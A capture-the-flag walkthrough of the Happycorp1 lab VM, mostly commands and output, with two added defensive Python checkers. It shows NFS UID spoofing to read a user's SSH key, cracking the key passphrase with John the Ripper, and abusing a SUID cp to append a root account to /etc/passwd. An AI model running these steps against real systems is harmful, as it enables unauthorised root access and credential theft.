Happycorp1
summary on the cover page
Note: to fix the machine's network, I log into the machine and reconfigure the network:
https://www.shellhacks.com/how-to-grant-root-access-user-root-privileges-linux/
1) Enumeration
- I scan the network:
ip a | grep global
nmap -sn 192.168.56.1/24 -T3
```
jejo@em50l:~$ ip a |grep global
    inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0
jejo@em50l:~$ nmap -sn 192.168.56.1/24 -T3
Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:16 CET
Nmap scan report for 192.168.56.101
Host is up (0.0017s latency).
```
- I scan the IP of the machine to pentest:
nmap -nT3 192.168.56.101
```
jejo@em50l:~$ nmap -nT3 192.168.56.101
Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:32 CET
Nmap scan report for 192.168.56.101
Host is up (0.0030s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
2049/tcp open  nfs
```
- http scan:
nmap -n 192.168.56.101 -p 80 -script *http*
```
jejo@em50l:~$ nmap -n 192.168.56.101 -p 80 -script *http*
Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-30 21:41 CET
Nmap scan report for 192.168.56.101
Host is up (0.00041s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|   /admin.php: Possible admin folder
|   /robots.txt: Robots file
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.25'
|   /img/: Potentially interesting directory w/ listing on 'apache/2.4.25'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.25'
|   /lib/: Potentially interesting directory w/ listing on 'apache/2.4.25'
|_  /manual/: Potentially interesting folder
Nmap done: 1 IP address (1 host up) scanned in 1.47 seconds
```
- Let's take a look at the web (http):
- Let's take a look at the nfs:
```
root@kali:~# showmount -e 192.168.56.101
Export list for 192.168.56.101:
/home/karl *
root@kali:~# mkdir /mnt/nfs
root@kali:~# sudo mount -t nfs 192.168.56.101:/home/karl /mnt/nfs
root@kali:~# ls -lha /mnt/nfs/
total 28K
drwxr-xr-x 3 1001 1001 4.0K Mar  5  2019 .
drwxr-xr-x 3 root root 4.0K Oct 30 17:36 ..
lrwxrwxrwx 1 root root    9 Mar  5  2019 .bash_history -> /dev/null
-rw-r--r-- 1 1001 1001  220 Mar  4  2019 .bash_logout
-rw-r--r-- 1 1001 1001 3.5K Mar  5  2019 .bashrc
-rw------- 1 1001 1001   28 Mar  4  2019 .lesshst
-rw-r--r-- 1 1001 1001  675 Mar  4  2019 .profile
drwx------ 2 1001 1001 4.0K Mar  5  2019 .ssh
```
https://www.cyberciti.biz/faq/howto-see-shares-on-nfs-server-exported-filesystems/
- It looks like the .ssh folder may contain something interesting.
Let's see what it holds:
```
root@kali:~# ls -lha /mnt/nfs/.ssh/
ls: cannot open directory '/mnt/nfs/.ssh/': Permission denied
```
Permission denied (as root)????
That is the NFS server's root_squash at work: the client's root is mapped to an unprivileged user, while every other UID is trusted exactly as the client presents it. So I'll have to create a user with uid 1001:
useradd --uid 1001 aux_user
```
root@kali:~# useradd --uid 1001 aux_user
root@kali:~# ls -lha /mnt/nfs/
total 28K
drwxr-xr-x 3 aux_user aux_user 4.0K Mar  5  2019 .
drwxr-xr-x 3 root     root     4.0K Oct 30 17:36 ..
lrwxrwxrwx 1 root     root        9 Mar  5  2019 .bash_history -> /dev/null
-rw-r--r-- 1 aux_user aux_user  220 Mar  4  2019 .bash_logout
-rw-r--r-- 1 aux_user aux_user 3.5K Mar  5  2019 .bashrc
-rw------- 1 aux_user aux_user   28 Mar  4  2019 .lesshst
-rw-r--r-- 1 aux_user aux_user  675 Mar  4  2019 .profile
drwx------ 2 aux_user aux_user 4.0K Mar  5  2019 .ssh
```
Now, with the permissions of user 1001, I should be able to see the contents of .ssh. As expected: some access files (keys).
```
root@kali:~# su aux_user
$ ls -lha /mnt/nfs/.ssh
total 24K
drwx------ 2 aux_user aux_user 4.0K Mar  5  2019 .
drwxr-xr-x 3 aux_user aux_user 4.0K Mar  5  2019 ..
-rw-r--r-- 1 aux_user aux_user  740 Mar  4  2019 authorized_keys
-rw------- 1 aux_user aux_user 3.3K Mar  4  2019 id_rsa
-rw-r--r-- 1 aux_user aux_user  740 Mar  4  2019 id_rsa.pub
-rw-r--r-- 1 aux_user aux_user   18 Mar  4  2019 user.txt
```
```
root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/user.txt"
flag1{Z29vZGJveQ}
```
Got the first flag: flag1{Z29vZGJveQ}
```
root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/authorized_keys"
ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp
```
ok, the user is karl
```
root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/id_rsa.pub"
ssh-rsa AAAAB3Nza.......GVm7Q== karl@happycorp
```
And we have the private key: id_rsa
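A defender's view of the finding above, as an added example (not code from the write-up): a small Python checker that parses /etc/exports lines and flags exports that, like `/home/karl *`, are open to any client and trust whatever UID the client presents. The sample exports file inside it is constructed.

```python
"""Audit /etc/exports-style lines for the NFS weaknesses seen above.

The export reported by showmount ("/home/karl *") lets any client mount a
home directory, and the default root_squash only demotes the client's root:
every other UID is trusted as-is, so a client that creates a local user with
UID 1001 reads that home directory (including .ssh).  This checker is an
added example, not the target's own configuration; the sample exports file
below is constructed.
"""
import re
from dataclasses import dataclass, field

# Client specs that mean "anyone": bare '*', a '*.' wildcard domain, or 0.0.0.0/0.
ANY_CLIENT = re.compile(r"^\*?$|^\*\.|^0\.0\.0\.0/0$")
SENSITIVE_PREFIXES = ("/home", "/root", "/etc")

@dataclass
class Finding:
    path: str
    client: str
    problems: list = field(default_factory=list)

def parse_export(line):
    """Yield (path, client, options) tuples for one /etc/exports line."""
    line = line.split("#", 1)[0].strip()          # drop comments
    if not line:
        return
    parts = line.split()
    path, specs = parts[0], parts[1:] or ["*"]    # no client spec == everyone
    for spec in specs:
        m = re.match(r"^([^(]*)(?:\((.*)\))?$", spec)
        if not m:
            continue                               # unbalanced parens: skip
        client = m.group(1) or "*"
        opts = {o.strip() for o in (m.group(2) or "").split(",") if o.strip()}
        yield path, client, opts

def audit_exports(text):
    """Return one Finding per export that relies on client-side UID trust."""
    findings = []
    for line in text.splitlines():
        for path, client, opts in parse_export(line):
            f = Finding(path, client)
            if ANY_CLIENT.match(client):
                f.problems.append("exported to any client")
            if "no_root_squash" in opts:
                f.problems.append("no_root_squash: client root is server root")
            kerberos = any(o.startswith("sec=krb5") for o in opts)
            if "all_squash" not in opts and not kerberos:
                f.problems.append("trusts client UIDs (no all_squash / Kerberos)")
            if any(path == p or path.startswith(p + "/") for p in SENSITIVE_PREFIXES):
                f.problems.append("exports a sensitive path")
            if f.problems:
                findings.append(f)
    return findings

# Constructed sample: the first line reproduces the export seen via showmount -e.
SAMPLE_EXPORTS = """\
/home/karl *(rw,sync,no_subtree_check)
/srv/share 192.168.56.0/24(ro,sync,all_squash,no_subtree_check)
/data 192.168.56.105(rw,sync,no_root_squash)
"""

if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f.path} -> {f.client}: " + "; ".join(f.problems))
```

Run it against a real `/etc/exports` by feeding the file's text to `audit_exports`; an export that only `sec=krb5*` or `all_squash` protects is reported as clean.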
Let's see if it lets us in via ssh using the key we found:
ssh karl@192.168.56.101 -i /mnt/nfs/.ssh/id_rsa
```
$ ssh karl@192.168.56.101 -i /mnt/nfs/.ssh/id_rsa
Could not create directory '/home/aux_user/.ssh'.
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:uXiM0zLVXRQYHkhNxuTByBPb14pH1AJn6IpACByicCY.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/aux_user/.ssh/known_hosts).
Enter passphrase for key '/mnt/nfs/.ssh/id_rsa':
```
Oops, a problem… I'll need to find out the passphrase of the key file….
Searching a bit: "RSA PRIVATE KEY lost pass phrase"
I find: https://askubuntu.com/questions/346114/how-to-retrieve-passphrase-for-private-key
Second search: "john rip RSA PRIVATE KEY"
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
Reading it, I see that the `ssh2john` command is missing (I look for it with `locate *2john`).
Preparations
```
root@kali:~# su aux_user -c "cat /mnt/nfs/.ssh/id_rsa" > id_rsa.crack
root@kali:~# wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/ssh2john.py
root@kali:~# python ./ssh2john.py id_rsa.crack > id_rsa.crack.txt
```
> Useful notes/lookups: `john --help` / `locate *rockyou*` / `locate john`
```
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.crack.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/32])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Note: This format may emit false positives, so it will keep trying even after finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
sheep            (id_rsa.crack)
1g 0:00:00:25 DONE (2019-11-19 17:12) 0.03897g/s 558912p/s 558912c/s 558912C/s *7¡Vamos!
Session completed
```
It looks like the passphrase is **`sheep`**
## Let's try the ssh connection
```
root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack
Enter passphrase for key 'id_rsa.crack': sheep
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 30 18:36:40 2019 from 192.168.56.105
rbash: warning: shell level (1000) too high, resetting to 1
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: retry: Resource temporarily unavailable
rbash: fork: Resource temporarily unavailable
karl@happycorp:~$
```
Oops, there seems to be a problem: the login shell doesn't work properly.
I'll try an alternative shell: ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/sh
```
root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/sh
Enter passphrase for key 'id_rsa.crack':
$ whoami
karl
$
```
Privilege escalation: Enumeration
- Enumeration (from the shell): OS and kernel version
uname -a
cat /etc/*release
```
$ uname -a
Linux happycorp 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux
$ cat /etc/*release
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
```
- Searching for exploits for the OS and kernel:
searchsploit Debian 4.9
```
root@kali:~# searchsploit Debian 4.9
Exploits: No Result
Shellcodes: No Result
```
No result.
Another way: auto_searchsploit.py
```
root@kali:~# https://raw.githubusercontent.com/ngalongc/AutoLocalPrivilegeEscalation/master/auto_priv_exploit.sh
root@kali:~# bash auto_priv_exploit.sh 4.9
[*] Possible Exploit
No possible exploit. Please use another version.
root@kali:~# python auto_searchsploit.py 4.9
[-] No potential exploit found. Aborting...
```
- Enumeration: LinEnum.sh
- I download LinEnum and copy the file to the target machine
```
root@kali:~# scp -i id_rsa.crack ./LinEnum.sh karl@192.168.56.101:/tmp
Enter passphrase for key 'id_rsa.crack':
LinEnum.sh                                    100%   45KB   4.0MB/s   00:00
```
- Too much information (I'm going to filter it a bit)
```
[+] It looks like we have password hashes in /etc/passwd!
toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc

[-] Installed compilers:
ii  gcc    4:6.3.0-4        amd64  GNU C compiler
ii  gcc-6  6.3.0-18+deb9u1  amd64  GNU C compiler

[+] Possibly interesting SUID files:
-rwsr-xr-x 1 root root 130504 Feb 22  2017 /bin/cp
```
!!!cp command with root privileges!!!
Let's see if it's exploitable:
https://gtfobins.github.io/gtfobins/cp/
- Enumeration: LinuxSmartEnumeration lse.sh
- Although we have already enumerated, I'll leave this option here
```
root@kali:~# wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh"
root@kali:~# scp -i id_rsa.crack ./lse.sh karl@192.168.56.101:/tmp
Enter passphrase for key 'id_rsa.crack':
lse.sh                                        100%   31KB   1.6MB/s   00:00
```
```
root@kali:~# ssh karl@192.168.56.101 -i id_rsa.crack -t /bin/bash /tmp/lse.sh
Enter passphrase for key 'id_rsa.crack':
---
User: karl
User ID: 1001
Password: none
Home: /home/karl
Path: /usr/local/bin:/usr/bin:/bin:/usr/games
umask: 0022

Hostname: happycorp
Linux: 4.9.0-8-amd64
Distribution: Debian GNU/Linux 9.8 (stretch)
Architecture: x86_64

==================================================================( users )=====
[i] usr000 Current user groups............................................. yes!
[*] usr010 Is current user in an administrative group?..................... nope
[*] usr020 Are there other users in an administrative groups?.............. nope
[*] usr030 Other users with shell.......................................... yes!
[i] usr040 Environment information......................................... skip
[i] usr050 Groups for other users.......................................... skip
[i] usr060 Other users..................................................... skip
===================================================================( sudo )=====
[!] sud000 Can we sudo without a password?................................. nope
[!] sud010 Can we list sudo commands without a password?................... nope
[*] sud040 Can we read /etc/sudoers?....................................... nope
[*] sud050 Do we know if any other users used sudo?........................ nope
============================================================( file system )=====
[*] fst000 Writable files outside user's home.............................. yes!
[*] fst010 Binaries with setuid bit........................................ yes!
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/bin/cp
---
[!] fst030 Can we write to any setuid binary?.............................. nope
[*] fst040 Binaries with setgid bit........................................ skip
[!] fst050 Uncommon setgid binaries........................................ skip
[!] fst060 Can we write to any setgid binary?.............................. skip
[*] fst070 Can we read /root?.............................................. nope
[*] fst080 Can we read subdirectories under /home?......................... nope
[*] fst090 SSH files in home directories................................... yes!
[*] fst100 Useful binaries................................................. yes!
[*] fst110 Other interesting files in home directories..................... nope
[!] fst120 Are there any credentials in fstab/mtab?........................ nope
[*] fst130 Does 'karl' have mail?.......................................... nope
[!] fst140 Can we access other users mail?................................. nope
[*] fst150 Looking for GIT/SVN repositories................................ nope
[!] fst160 Can we write to critical files?................................. nope
[i] fst500 Files owned by user 'karl'...................................... skip
[i] fst510 SSH files anywhere.............................................. skip
[i] fst520 Check hosts.equiv file and its contents......................... skip
[i] fst530 List NFS server shares.......................................... skip
[i] fst540 Dump fstab file................................................. skip
=================================================================( system )=====
[i] sys000 Who is logged in................................................ skip
[i] sys010 Last logged in users............................................ skip
[!] sys020 Does the /etc/passwd have hashes?............................... yes!
---
toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash
---
[!] sys030 Can we read /etc/shadow file?................................... nope
[!] sys030 Can we read /etc/shadow- file?.................................. nope
[!] sys030 Can we read /etc/shadow~ file?.................................. nope
[!] sys030 Can we read /etc/master.passwd file?............................ nope
[*] sys040 Check for other superuser accounts.............................. yes!
[*] sys050 Can root user log in via SSH?................................... nope
[i] sys060 List available shells........................................... skip
[i] sys070 System umask in /etc/login.defs................................. skip
[i] sys080 System password policies in /etc/login.defs..................... skip
===============================================================( security )=====
[*] sec000 Is SELinux present?............................................. nope
[*] sec010 List files with capabilities.................................... nope
[!] sec020 Can we write to a binary with caps?............................. nope
[!] sec030 Do we have all caps in any binary?.............................. nope
[*] sec040 Users with associated capabilities.............................. nope
[!] sec050 Does current user have capabilities?............................ skip
========================================================( recurrent tasks )=====
[*] ret000 User crontab.................................................... nope
[!] ret010 Cron tasks writable by user..................................... nope
[*] ret020 Cron jobs....................................................... yes!
[*] ret030 Can we read user crontabs....................................... nope
[*] ret040 Can we list other user cron tasks?.............................. nope
[!] ret050 Can we write to executable paths present in cron jobs........... nope
[*] ret060 Can we write to any paths present in cron jobs.................. nope
[i] ret400 Cron files...................................................... skip
[*] ret500 User systemd timers............................................. nope
[!] ret510 Can we write in any system timer?............................... nope
[i] ret900 Systemd timers.................................................. skip
================================================================( network )=====
[*] net000 Services listening only on localhost............................ nope
[!] net010 Can we sniff traffic with tcpdump?.............................. nope
[i] net500 NIC and IP information.......................................... skip
[i] net510 Routing table................................................... skip
[i] net520 ARP table....................................................... skip
[i] net530 Namerservers.................................................... skip
[i] net540 Systemd Nameservers............................................. skip
[i] net550 Listening TCP................................................... skip
[i] net560 Listening UDP................................................... skip
===============================================================( services )=====
[!] srv000 Can we write in service files?.................................. nope
[!] srv010 Can we write in binaries executed by services?.................. nope
[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope
[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope
[*] srv040 Upstart files not belonging to root............................. nope
[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope
[i] srv400 Contents of /etc/inetd.conf..................................... skip
[i] srv410 Contents of /etc/xinetd.conf.................................... skip
[i] srv420 List /etc/xinetd.d if used...................................... skip
[i] srv430 List /etc/init.d/ permissions................................... skip
[i] srv440 List /etc/rc.d/init.d permissions............................... skip
[i] srv450 List /usr/local/etc/rc.d permissions............................ skip
[i] srv460 List /etc/init/ permissions..................................... skip
[!] srv500 Can we write in systemd service files?.......................... nope
[!] srv510 Can we write in binaries executed by systemd services?.......... nope
[*] srv520 Systemd files not belonging to root............................. nope
[i] srv900 Systemd config files permissions................................ skip
==============================================================( processes )=====
[!] pro000 Can we write in any process binary?............................. nope
[*] pro010 Processes running with root permissions......................... yes!
[i] pro500 Running processes............................................... skip
[i] pro510 Running process binaries and permissions........................ skip
===============================================================( software )=====
[!] sof000 Can we connect to MySQL with root/root credentials?............. nope
[!] sof010 Can we connect to MySQL as root without password?............... nope
[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope
[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope
[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope
[*] sof030 Installed apache modules........................................ yes!
[!] sof040 Found any .htpasswd files?...................................... nope
[i] sof500 Sudo version.................................................... skip
[i] sof510 MySQL version................................................... skip
[i] sof520 Postgres version................................................ skip
[i] sof530 Apache version.................................................. skip
=============================================================( containers )=====
[*] ctn000 Are we in a docker container?................................... nope
[*] ctn010 Is docker available?............................................ nope
[!] ctn020 Is the user a member of the 'docker' group?..................... nope
[*] ctn200 Are we in a lxc container?...................................... nope
[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope
==================================( FINISHED )==================================
Connection to 192.168.56.101 closed.
```
Worth highlighting:
[!] fst020 Uncommon setuid binaries........................................ yes! --- /bin/cp ---
Privilege escalation: Exploiting the vulnerabilities found.
https://gtfobins.github.io/gtfobins/cp/
The strategy would be:
- Generate a passwd line, based on what root's line in /etc/passwd looks like: I generate a similar line with a password hash instead of `:x:`
```
root@kali:~# cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
root@kali:~# openssl passwd -1 -salt jejo jejo
$1$jejo$4.S4N2nsF5I9dhmE1iqLD/
root@kali:~# echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash'
jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash
```
- Copy the file /etc/passwd to a temporary path (that way I free up permissions):
cp /etc/passwd /tmp/passwd
- Append the generated line to the passwd file:
```
$ echo 'jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash' >> /tmp/passwd
/bin/sh: 13: cannot create /tmp/passwd: Permission denied
```
Oops, it won't let me: since cp runs SUID root, the copy in /tmp is owned by root and karl can't write to it. So I add the line with nano and save it as passwd2.
- Copy the modified passwd file back to its original path:
```
$ cp /tmp/passwd2 /etc/passwd
$ tail -2 /etc/passwd
statd:x:107:65534::/var/lib/nfs:/bin/false
jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash
```
Got ROOT
```
$ su jejo
Password:
root@happycorp:/tmp# whoami
root
```
Here is the flag
```
root@happycorp:~# cat /root/root.txt
Congrats!
flag2{aGFja2VyZ29k}
Here is some useless ascii art :)
-Zayotic
```
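The tampering above is exactly what a passwd audit should catch, and both enumeration scripts already flagged the first symptom (the `toor` hash). Added example, not code from the write-up: a Python checker that parses passwd-format text, reports hashes or empty values in the password field and extra UID 0 accounts, and diffs against a baseline copy. The baseline text is constructed; the `toor` and `jejo` lines are the ones shown on this page.

```python
"""Detect the /etc/passwd tampering used in the privilege escalation above.

LinEnum and lse.sh both flagged a hash in /etc/passwd (the 'toor' line); the
escalation then appends a second UID 0 line with its own hash.  This checker
is an added example, not code from the write-up: it parses passwd-format
text and reports (a) a hash or empty value where 'x' belongs, (b) UID 0
accounts other than root, and (c) names that appeared since a baseline copy.
"""
import re

# md5crypt ($1$), bcrypt ($2*$), sha-crypt ($5$/$6$), yescrypt ($y$/$gy$) prefixes
CRYPT_HASH = re.compile(r"^\$(1|2[aby]?|5|6|y|gy|7)\$")
LOCKED = {"x", "*", "!", "!!"}   # values meaning "look in /etc/shadow" or "disabled"

def parse_passwd(text):
    """Return one dict per line; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"name": fields[0], "line": lineno, "malformed": True})
            continue
        name, pw, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": uid, "gid": gid,
                        "home": home, "shell": shell, "line": lineno,
                        "malformed": False})
    return entries

def audit_passwd(text):
    """Return (name, reason) tuples for suspicious entries, in file order."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["name"], "malformed entry"))
            continue
        pw = e["pw"]
        if pw == "":
            findings.append((e["name"], "empty password field (no password required)"))
        elif pw not in LOCKED:
            kind = "crypt hash" if CRYPT_HASH.match(pw) else "unexpected value"
            findings.append((e["name"], f"{kind} in password field (should be in /etc/shadow)"))
        if e["uid"] == "0" and e["name"] != "root":
            findings.append((e["name"], "extra UID 0 account"))
    return findings

def new_entries(baseline, current):
    """Account names present in `current` but not in `baseline` (integrity view)."""
    known = {e["name"] for e in parse_passwd(baseline)}
    return [e["name"] for e in parse_passwd(current) if e["name"] not in known]

# Constructed baseline; the toor line is the one both enumeration scripts reported.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
karl:x:1001:1001::/home/karl:/bin/rbash
statd:x:107:65534::/var/lib/nfs:/bin/false
toor:$1$toor$2SrtV0M1RHrAj9uQL5C7w/:0:0:root:/root:/bin/bash
"""
# State after the escalation: the jejo line from this write-up has been appended.
AFTER = BASELINE + "jejo:$1$jejo$4.S4N2nsF5I9dhmE1iqLD/:0:0:root:/root:/bin/bash\n"

if __name__ == "__main__":
    for name, reason in audit_passwd(AFTER):
        print(f"{name}: {reason}")
    print("new since baseline:", new_entries(BASELINE, AFTER))
```

On a real host, feed it the contents of `/etc/passwd` and a copy taken at install time; a root-owned SUID copy tool like the one found here defeats file permissions, so the baseline diff is the check that does not depend on them.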
References
https://www.hackingarticles.in/happycorp1-vulnhub-walkthrough/
https://www.hackingarticles.in/beginners-guide-for-john-the-ripper-part-2/
https://bytesoverbombs.io/cracking-everything-with-john-the-ripper-d434f0f6dc1c
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://gtfobins.github.io/gtfobins/cp/
To investigate:
https://www.shellhacks.com/linux-generate-password-hash/
https://www.hackplayers.com/2016/12/automatizando-el-escalado-de.html
https://github.com/ngalongc/AutoLocalPrivilegeEscalation